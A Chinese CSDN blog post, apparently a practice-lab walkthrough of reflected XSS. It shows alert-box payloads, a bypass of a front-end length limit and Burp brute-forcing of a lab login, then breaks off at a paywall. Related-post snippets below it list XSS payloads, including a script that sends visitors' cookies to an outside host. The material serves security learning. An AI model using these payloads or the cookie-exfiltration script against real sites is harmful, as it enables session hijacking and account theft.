二、XSS(跨站脚本)攻击

已于 2022-08-19 22:56:45 修改
阅读量995 收藏 3
点赞数 1
分类专栏: Pikachu靶场实战演练 文章标签: xss 前端
于 2022-08-19 22:52:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59584646/article/details/126396062
版权
本文详细介绍了XSS攻击的五种类型:反射型、POST型、储存型、DOM型和DOM-X型,通过实例展示了攻击过程。同时,探讨了XSS盲打和过滤机制,并提出防御策略,包括输入过滤和输出转义,以防止XSS漏洞带来的危害。
摘要由CSDN通过智能技术生成

1.反射型XSS(GET)(只会把XSS保存浏览器上,只有自己能看到,刷新页面就会消失只能用一次)

直接输入标签型XSS试试

<script>alert(1)</script>

输入到一半发现输入不了了,有长度限制

按F12,看一下前端代码

发现有长度限制,我们可以直接双击,把这个值改大就好了

继续我们的修改,点击提交

弹框了,说明存在反射型XSS

2. 反射型XSS(POST)(只会把XSS保存浏览器上,只有自己能看到,刷新页面就会消失只能用一次)

POST的XSS需要先登录一下

先用burp抓个包,然后爆破一下账号密码

账号密码爆破的结果是

账号admin   密码123456

登陆一下

发现出现一个和GET反射型XSS一样的框

尝试输入

<script>alert(1)</script>

提交

最低0.47元/天 解锁文章
Charon622
关注
专栏目录
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
XSS攻击常用脚本
极客神殿
05-27 2330
1、这个应该都知道<script>alert("test")</script> 常用于测试 是否存在跨站 2、这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和密码。<script>window.alert(document.cookie);</script>3、当用户浏览该 页时,将弹出壹个高爲200,宽爲2
xss跨站脚本攻击
最新发布
qq_64951792的博客
08-18 842
xss攻击
常见的XSS攻击代码
weixin_30621711的博客
11-09 657
第一类: <tag on*=*/> 在html标签中触发事件 Example: 1.加载完毕自动触发事件 <body onload="alert('xss')"></body> 2.使html某元素撑满整个页面 <p onclick="alert('1')" style="postion:fixed;width:100%;hei...
XSS(跨站脚本攻击) - 常用代码大全
热门推荐
CHK的博客
08-20 5万+
XSS(跨站脚本攻击) - 常用代码大全: 1'"()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;prompt(915149)&lt;/ScRiPt&gt; &lt;svg/onload=alert(1)&gt; &lt;script&gt;alert(document.cookie)&lt;/script&gt; '&gt;&lt;script&a
XSS跨站脚本攻击
Forget_liu的博客
05-03 202
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
XSS攻击代码
bravezhe的专栏
01-06 909
var img=document.createElement("img");img.src="http://myurl.com/send.php?location="+escape(document.location)+'&cookie='+escape(document.cookie)+'&agent='+escape(window.navigator.userAgent);document.b
XSS跨站攻击,注入代码整理,大全
03-03
XSS跨站攻击,注入代码整理,希望大家支持
XSS攻击及防御代码的简单演示
04-25
这个是XSS攻击及防御代码的简单演示,利用Node搭建的
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
XSS漏洞
04-05
NULL 博文链接:https://0001111.iteye.com/blog/1440168
XSS攻击测试代码
mayanyun2013的专栏
11-28 4891
XSS攻击测试代码 主要攻击是通过在输入框内输入获取服务器的cookie的信息,从而登陆你的服务器, 原理是通过在前端的关键字内输入攻击的值,然后这些值存储在数据库内,后端服务器通过调取这个键值对,从而触发获取服务器端的cookie信息。 所以前后端要进行特殊字符的处理,不让输入一些特殊标签,如&lt;script&gt;,HTML等代码标签或者特殊字符 1.获取用户的cookie &l...
xss payload
07-15 407
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
XSS 攻击常用代码
高压锅博客
12-22 7357
【代码】XSS 攻击常用代码。
xss攻击 html代码,常见的XSS攻击代码
weixin_35671110的博客
06-07 2076
第一类:在html标签事件中触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用。eg:1.使html元素占据整个显示页面 2.增加属性触发事件 3.自动触发事件在真实环境中,‘ 、" 、( 、) 都是属于黑名单中的成员,如果遇到以上四个字符被过滤的情况,那么我们就需要使用其他字符去代替,或者编码的方式去绕过。eg:1.不使用 " 2.不使用 ‘ 3.不使用...
Java开发中防范XSS跨站脚本攻击策略
"XSS跨站脚本攻击在Java开发中防范的方法" XSS(Cross-Site Scripting)攻击是Web应用程序普遍面临的一种安全威胁。它允许攻击者在受害者的浏览器中执行恶意脚本,通常通过注入恶意代码到合法的网页中实现。在Java...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值